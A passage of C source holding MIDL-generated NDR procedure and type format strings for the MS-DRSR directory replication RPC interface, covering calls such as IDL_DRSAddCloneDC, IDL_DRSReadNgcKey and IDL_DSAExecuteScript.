/* 1772 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1774 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 1776 */	NdrFcShort( 0x4113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=16 */
/* 1778 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1780 */	NdrFcShort( 0x1be8 ),	/* Type Offset=7144 */

	/* Return value */

/* 1782 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1784 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 1786 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSAddCloneDC */

/* 1788 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 1790 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1794 */	NdrFcShort( 0x1c ),	/* 28 */
/* 1796 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 1798 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1800 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1802 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1804 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1806 */	NdrFcShort( 0x24 ),	/* 36 */
/* 1808 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 1810 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 1812 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1814 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1816 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1818 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1820 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1822 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1824 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 1826 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1828 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1830 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 1832 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1834 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1836 */	NdrFcShort( 0x1c14 ),	/* Type Offset=7188 */

	/* Parameter pdwOutVersion */

/* 1838 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 1840 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1842 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 1844 */	NdrFcShort( 0x8113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=32 */
/* 1846 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1848 */	NdrFcShort( 0x1c4c ),	/* Type Offset=7244 */

	/* Return value */

/* 1850 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1852 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 1854 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSWriteNgcKey */

/* 1856 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 1858 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1862 */	NdrFcShort( 0x1d ),	/* 29 */
/* 1864 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 1866 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1868 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1870 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1872 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1874 */	NdrFcShort( 0x24 ),	/* 36 */
/* 1876 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 1878 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 1880 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1882 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1884 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1886 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1888 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1890 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1892 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 1894 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1896 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1898 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 1900 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1902 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1904 */	NdrFcShort( 0x1ca0 ),	/* Type Offset=7328 */

	/* Parameter pdwOutVersion */

/* 1906 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 1908 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1910 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 1912 */	NdrFcShort( 0x2113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=8 */
/* 1914 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1916 */	NdrFcShort( 0x1cf0 ),	/* Type Offset=7408 */

	/* Return value */

/* 1918 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1920 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 1922 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSReadNgcKey */

/* 1924 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 1926 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1930 */	NdrFcShort( 0x1e ),	/* 30 */
/* 1932 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 1934 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1936 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1938 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1940 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1942 */	NdrFcShort( 0x24 ),	/* 36 */
/* 1944 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 1946 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 1948 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1950 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1952 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1954 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1956 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1958 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1960 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 1962 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1964 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1966 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 1968 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1970 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1972 */	NdrFcShort( 0x1d14 ),	/* Type Offset=7444 */

	/* Parameter pdwOutVersion */

/* 1974 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 1976 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1978 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 1980 */	NdrFcShort( 0x4113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=16 */
/* 1982 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1984 */	NdrFcShort( 0x1d46 ),	/* Type Offset=7494 */

	/* Return value */

/* 1986 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1988 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 1990 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DSAPrepareScript */

/* 1992 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 1994 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1998 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2000 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 2002 */	0x32,		/* FC_BIND_PRIMITIVE */
			0x0,		/* 0 */
/* 2004 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 2006 */	NdrFcShort( 0x8 ),	/* 8 */
/* 2008 */	NdrFcShort( 0x24 ),	/* 36 */
/* 2010 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x5,		/* 5 */
/* 2012 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 2014 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2016 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2018 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2020 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter dwInVersion */

/* 2022 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 2024 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 2026 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 2028 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 2030 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 2032 */	NdrFcShort( 0x1d90 ),	/* Type Offset=7568 */

	/* Parameter pdwOutVersion */

/* 2034 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 2036 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 2038 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 2040 */	NdrFcShort( 0x113 ),	/* Flags:  must size, must free, out, simple ref, */
/* 2042 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 2044 */	NdrFcShort( 0x1db4 ),	/* Type Offset=7604 */

	/* Return value */

/* 2046 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 2048 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 2050 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DSAExecuteScript */

/* 2052 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 2054 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2058 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2060 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 2062 */	0x32,		/* FC_BIND_PRIMITIVE */
			0x0,		/* 0 */
/* 2064 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 2066 */	NdrFcShort( 0x8 ),	/* 8 */
/* 2068 */	NdrFcShort( 0x24 ),	/* 36 */
/* 2070 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x5,		/* 5 */
/* 2072 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 2074 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2076 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2078 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2080 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter dwInVersion */

/* 2082 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 2084 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 2086 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 2088 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 2090 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 2092 */	NdrFcShort( 0x1e40 ),	/* Type Offset=7744 */

	/* Parameter pdwOutVersion */

/* 2094 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 2096 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 2098 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 2100 */	NdrFcShort( 0x4113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=16 */
/* 2102 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 2104 */	NdrFcShort( 0x1e8a ),	/* Type Offset=7818 */

	/* Return value */

/* 2106 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 2108 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 2110 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

			0x0
        }
    };

// TYPE Format String (extracted from WORKING ms-drsr_c.c)
static const ms2Ddrsr_MIDL_TYPE_FORMAT_STRING ms2Ddrsr__MIDL_TypeFormatString =
    {
        0,
        {
			NdrFcShort( 0x0 ),	/* 0 */
/*  2 */
			0x12, 0x0,	/* FC_UP */
/*  4 */	NdrFcShort( 0x8 ),	/* Offset= 8 (12) */
/*  6 */
			0x1d,		/* FC_SMFARRAY */
			0x0,		/* 0 */
/*  8 */	NdrFcShort( 0x8 ),	/* 8 */
/* 10 */	0x1,		/* FC_BYTE */
			0x5b,		/* FC_END */
/* 12 */
			0x15,		/* FC_STRUCT */
			0x3,		/* 3 */
/* 14 */	NdrFcShort( 0x10 ),	/* 16 */
/* 16 */	0x8,		/* FC_LONG */
			0x6,		/* FC_SHORT */
/* 18 */	0x6,		/* FC_SHORT */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 20 */	0x0,		/* 0 */
			NdrFcShort( 0xfff1 ),	/* Offset= -15 (6) */
			0x5b,		/* FC_END */
/* 24 */
			0x12, 0x0,	/* FC_UP */
/* 26 */	NdrFcShort( 0x18 ),	/* Offset= 24 (50) */
/* 28 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 30 */	NdrFcShort( 0x1 ),	/* 1 */
/* 32 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 34 */	NdrFcShort( 0xfffc ),	/* -4 */
/* 36 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 38 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 40 */	NdrFcLong( 0x1 ),	/* 1 */
/* 44 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 48 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 50 */
			0x17,		/* FC_CSTRUCT */
			0x3,		/* 3 */
/* 52 */	NdrFcShort( 0x4 ),	/* 4 */
/* 54 */	NdrFcShort( 0xffe6 ),	/* Offset= -26 (28) */
/* 56 */	0x8,		/* FC_LONG */
			0x5b,		/* FC_END */
/* 58 */
			0x11, 0x14,	/* FC_RP [alloced_on_stack] [pointer_deref] */
/* 60 */	NdrFcShort( 0xffdc ),	/* Offset= -36 (24) */
/* 62 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 64 */	NdrFcShort( 0x2 ),	/* Offset= 2 (66) */
/* 66 */	0x30,		/* FC_BIND_CONTEXT */
			0xa0,		/* Ctxt flags:  via ptr, out, */
/* 68 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 70 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 72 */	NdrFcShort( 0x2 ),	/* Offset= 2 (74) */
/* 74 */	0x30,		/* FC_BIND_CONTEXT */
			0xe1,		/* Ctxt flags:  via ptr, in, out, can't be null */
/* 76 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 78 */	0x30,		/* FC_BIND_CONTEXT */
			0x41,		/* Ctxt flags:  in, can't be null */
/* 80 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 82 */
			0x11, 0x0,	/* FC_RP */
/* 84 */	NdrFcShort( 0x2 ),	/* Offset= 2 (86) */
/* 86 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 88 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 90 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 92 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 94 */	0x0 ,
			0x0,		/* 0 */
/* 96 */	NdrFcLong( 0x0 ),	/* 0 */
/* 100 */	NdrFcLong( 0x0 ),	/* 0 */
/* 104 */	NdrFcShort( 0x2 ),	/* Offset= 2 (106) */
/* 106 */	NdrFcShort( 0x40 ),	/* 64 */
/* 108 */	NdrFcShort( 0x2 ),	/* 2 */
/* 110 */	NdrFcLong( 0x1 ),	/* 1 */
/* 114 */	NdrFcShort( 0x42 ),	/* Offset= 66 (180) */
/* 116 */	NdrFcLong( 0x2 ),	/* 2 */
/* 120 */	NdrFcShort( 0x76 ),	/* Offset= 118 (238) */
/* 122 */	NdrFcShort( 0xffff ),	/* Offset= -1 (121) */
/* 124 */
			0x1d,		/* FC_SMFARRAY */
			0x0,		/* 0 */
/* 126 */	NdrFcShort( 0x1c ),	/* 28 */
/* 128 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 130 */
			0x15,		/* FC_STRUCT */
			0x0,		/* 0 */
/* 132 */	NdrFcShort( 0x1c ),	/* 28 */
/* 134 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 136 */	NdrFcShort( 0xfff4 ),	/* Offset= -12 (124) */
/* 138 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 140 */
			0x1b,		/* FC_CARRAY */
			0x1,		/* 1 */
/* 142 */	NdrFcShort( 0x2 ),	/* 2 */
/* 144 */	0x9,		/* Corr desc: FC_ULONG */
			0x57,		/* FC_ADD_1 */
/* 146 */	NdrFcShort( 0xfffc ),	/* -4 */
/* 148 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 150 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 152 */	NdrFcLong( 0x0 ),	/* 0 */
/* 156 */	NdrFcLong( 0xa00001 ),	/* 10485761 */
/* 160 */	0x5,		/* FC_WCHAR */
			0x5b,		/* FC_END */
/* 162 */
			0x17,		/* FC_CSTRUCT */
			0x3,		/* 3 */
/* 164 */	NdrFcShort( 0x38 ),	/* 56 */
/* 166 */	NdrFcShort( 0xffe6 ),	/* Offset= -26 (140) */
/* 168 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 170 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 172 */	NdrFcShort( 0xff60 ),	/* Offset= -160 (12) */
/* 174 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 176 */	NdrFcShort( 0xffd2 ),	/* Offset= -46 (130) */
/* 178 */	0x8,		/* FC_LONG */
			0x5b,		/* FC_END */
/* 180 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 182 */	NdrFcShort( 0x28 ),	/* 40 */
/* 184 */	NdrFcShort( 0x0 ),	/* 0 */
/* 186 */	NdrFcShort( 0xc ),	/* Offset= 12 (198) */
/* 188 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 190 */	0x0,		/* 0 */
			NdrFcShort( 0xff4d ),	/* Offset= -179 (12) */
			0x36,		/* FC_POINTER */
/* 194 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 196 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 198 */
			0x11, 0x0,	/* FC_RP */
/* 200 */	NdrFcShort( 0xffda ),	/* Offset= -38 (162) */
/* 202 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 204 */
			0x22,		/* FC_C_CSTRING */
			0x5c,		/* FC_PAD */
/* 206 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 208 */	NdrFcShort( 0x1 ),	/* 1 */
/* 210 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 212 */	NdrFcShort( 0xfff4 ),	/* -12 */
/* 214 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 216 */	0x0 ,
			0x0,		/* 0 */
/* 218 */	NdrFcLong( 0x0 ),	/* 0 */
/* 222 */	NdrFcLong( 0x0 ),	/* 0 */
/* 226 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 228 */
			0x17,		/* FC_CSTRUCT */
			0x7,		/* 7 */
/* 230 */	NdrFcShort( 0x10 ),	/* 16 */
/* 232 */	NdrFcShort( 0xffe6 ),	/* Offset= -26 (206) */
/* 234 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 236 */	0xb,		/* FC_HYPER */
			0x5b,		/* FC_END */
/* 238 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 240 */	NdrFcShort( 0x40 ),	/* 64 */
/* 242 */	NdrFcShort( 0x0 ),	/* 0 */
/* 244 */	NdrFcShort( 0x10 ),	/* Offset= 16 (260) */
/* 246 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 248 */	0x0,		/* 0 */
			NdrFcShort( 0xff13 ),	/* Offset= -237 (12) */
			0x36,		/* FC_POINTER */
/* 252 */	0x8,		/* FC_LONG */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 254 */	0x0,		/* 0 */
			NdrFcShort( 0xff0d ),	/* Offset= -243 (12) */
			0x40,		/* FC_STRUCTPAD4 */
/* 258 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 260 */
			0x11, 0x0,	/* FC_RP */
/* 262 */	NdrFcShort( 0xff9c ),	/* Offset= -100 (162) */
/* 264 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 266 */
			0x22,		/* FC_C_CSTRING */
			0x5c,		/* FC_PAD */
/* 268 */
			0x12, 0x0,	/* FC_UP */
/* 270 */	NdrFcShort( 0xffd6 ),	/* Offset= -42 (228) */
/* 272 */
			0x11, 0x0,	/* FC_RP */
/* 274 */	NdrFcShort( 0x2 ),	/* Offset= 2 (276) */
/* 276 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 278 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 280 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 282 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 284 */	0x0 ,
			0x0,		/* 0 */
/* 286 */	NdrFcLong( 0x0 ),	/* 0 */
/* 290 */	NdrFcLong( 0x0 ),	/* 0 */
/* 294 */	NdrFcShort( 0x2 ),	/* Offset= 2 (296) */
/* 296 */	NdrFcShort( 0xa8 ),	/* 168 */
/* 298 */	NdrFcShort( 0x6 ),	/* 6 */
/* 300 */	NdrFcLong( 0x4 ),	/* 4 */
/* 304 */	NdrFcShort( 0x134 ),	/* Offset= 308 (612) */
/* 306 */	NdrFcLong( 0x5 ),	/* 5 */
/* 310 */	NdrFcShort( 0x14a ),	/* Offset= 330 (640) */
/* 312 */	NdrFcLong( 0x7 ),	/* 7 */
/* 316 */	NdrFcShort( 0x16c ),	/* Offset= 364 (680) */
/* 318 */	NdrFcLong( 0x8 ),	/* 8 */
/* 322 */	NdrFcShort( 0x18a ),	/* Offset= 394 (716) */
/* 324 */	NdrFcLong( 0xa ),	/* 10 */
/* 328 */	NdrFcShort( 0x1ba ),	/* Offset= 442 (770) */
/* 330 */	NdrFcLong( 0xb ),	/* 11 */
/* 334 */	NdrFcShort( 0x1ec ),	/* Offset= 492 (826) */
/* 336 */	NdrFcShort( 0xffff ),	/* Offset= -1 (335) */
/* 338 */
			0x15,		/* FC_STRUCT */
			0x7,		/* 7 */
/* 340 */	NdrFcShort( 0x18 ),	/* 24 */
/* 342 */	0xb,		/* FC_HYPER */
			0xb,		/* FC_HYPER */
/* 344 */	0xb,		/* FC_HYPER */
			0x5b,		/* FC_END */
/* 346 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 348 */	NdrFcShort( 0x1 ),	/* 1 */
/* 350 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 352 */	NdrFcShort( 0x0 ),	/* 0 */
/* 354 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 356 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 358 */	NdrFcLong( 0x0 ),	/* 0 */
/* 362 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 366 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 368 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 370 */	NdrFcShort( 0x10 ),	/* 16 */
/* 372 */	NdrFcShort( 0x0 ),	/* 0 */
/* 374 */	NdrFcShort( 0x6 ),	/* Offset= 6 (380) */
/* 376 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 378 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 380 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 382 */	NdrFcShort( 0xffdc ),	/* Offset= -36 (346) */
/* 384 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 386 */	NdrFcShort( 0x18 ),	/* 24 */
/* 388 */	NdrFcShort( 0x0 ),	/* 0 */
/* 390 */	NdrFcShort( 0x0 ),	/* Offset= 0 (390) */
/* 392 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 394 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 396 */	NdrFcShort( 0xffe4 ),	/* Offset= -28 (368) */
/* 398 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 400 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 402 */	NdrFcShort( 0x0 ),	/* 0 */
/* 404 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 406 */	NdrFcShort( 0x0 ),	/* 0 */
/* 408 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 410 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 412 */	NdrFcLong( 0x0 ),	/* 0 */
/* 416 */	NdrFcLong( 0x100000 ),	/* 1048576 */
/* 420 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 424 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 426 */	0x0 ,
			0x0,		/* 0 */
/* 428 */	NdrFcLong( 0x0 ),	/* 0 */
/* 432 */	NdrFcLong( 0x0 ),	/* 0 */
/* 436 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 438 */	NdrFcShort( 0xffca ),	/* Offset= -54 (384) */
/* 440 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 442 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 444 */	NdrFcShort( 0x10 ),	/* 16 */
/* 446 */	NdrFcShort( 0x0 ),	/* 0 */
/* 448 */	NdrFcShort( 0x6 ),	/* Offset= 6 (454) */
/* 450 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 452 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 454 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 456 */	NdrFcShort( 0xffc8 ),	/* Offset= -56 (400) */
/* 458 */
			0x15,		/* FC_STRUCT */
			0x7,		/* 7 */
/* 460 */	NdrFcShort( 0x18 ),	/* 24 */
/* 462 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 464 */	NdrFcShort( 0xfe3c ),	/* Offset= -452 (12) */
/* 466 */	0xb,		/* FC_HYPER */
			0x5b,		/* FC_END */
/* 468 */
			0x1b,		/* FC_CARRAY */
			0x7,		/* 7 */
/* 470 */	NdrFcShort( 0x18 ),	/* 24 */
/* 472 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 474 */	NdrFcShort( 0xfff8 ),	/* -8 */
